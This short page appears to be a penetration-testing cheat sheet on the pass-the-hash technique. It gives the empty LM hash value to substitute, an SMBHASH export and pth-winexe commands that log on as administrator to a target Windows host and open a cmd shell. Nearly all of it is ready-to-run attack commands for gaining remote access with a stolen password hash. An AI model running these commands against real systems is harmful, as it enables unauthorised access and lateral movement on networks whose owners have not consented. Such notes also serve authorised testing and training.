Passing the Hash
Pass the hash
Authenticate by passing the hash as a password instead of cracking it.
Replace the NOPASSWORD from the hashes with an empty LM hash: aad3b435b51404eeaad3b435b51404ee
pth-(TAB to see Options)
export SMBHASH=...........HASH................. # Remove NO PASSWORD on the hashes with an NTLM Hash
pth-winexe -U administrator% //10.10.10.10 cmd # Log on to the target
OR (just run the following)
pth-winexe -U administrator%hash //10.10.10.10 cmd # Log on to the target
Last modified 4yr ago